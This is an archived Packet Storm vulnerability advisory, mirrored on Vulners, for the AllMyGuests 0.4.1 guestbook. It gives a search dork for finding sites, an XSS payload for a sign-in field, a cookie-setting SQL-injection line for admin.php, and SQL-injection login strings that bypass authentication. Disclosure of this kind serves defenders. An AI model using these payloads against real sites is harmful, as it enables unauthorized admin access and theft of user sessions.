Lucene search
K

AllMyGuests 0.4.1 XSS / SQL Injection / Insecure Cookie Handling

🗓️ 29 Sep 2014 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 38 Views

AllMyGuests 0.4.1 Multi Vulnerability with XSS, SQL Injection, and Insecure Cookie Handling discovered by indoushka. Exploits include Cross Site Scripting on /AllMyGuests0.4.1/index.php and insecure cookie handling on admin.php allowing Auth Bypass

Code
`AllMyGuests0.4.1 Multi Vulnerability  
====================================  
Author : indoushka  
Vondor : http://www.php-resource.net/  
Dork: powered by AllMyGuests © 2003, voice of web  
==========================  
  
php info :  
  
http://localhost/AllMyGuests0.4.1/tools/phpinfo.php  
  
Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser.   
This vulnerability affects /AllMyGuests0.4.1/index.php.   
Discovered by: Scripting (XSS.script).   
Attack details  
POST (multipart) input AMG_signin_topic was set to 1" onmouseover=prompt(988847) bad="  
The input is reflected inside a tag parameter between double quotes.  
  
Insecure Cookie Handling :  
  
admin.php  
  
javascript:document.cookie="allmyphp_cookie=' or ' 1=1--;path=/";  
  
Auth Bypass :  
  
Username : azerty' or '1=1--# Real admin name  
Password : demo1 ' or ' 1=1 or admin or any thing  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation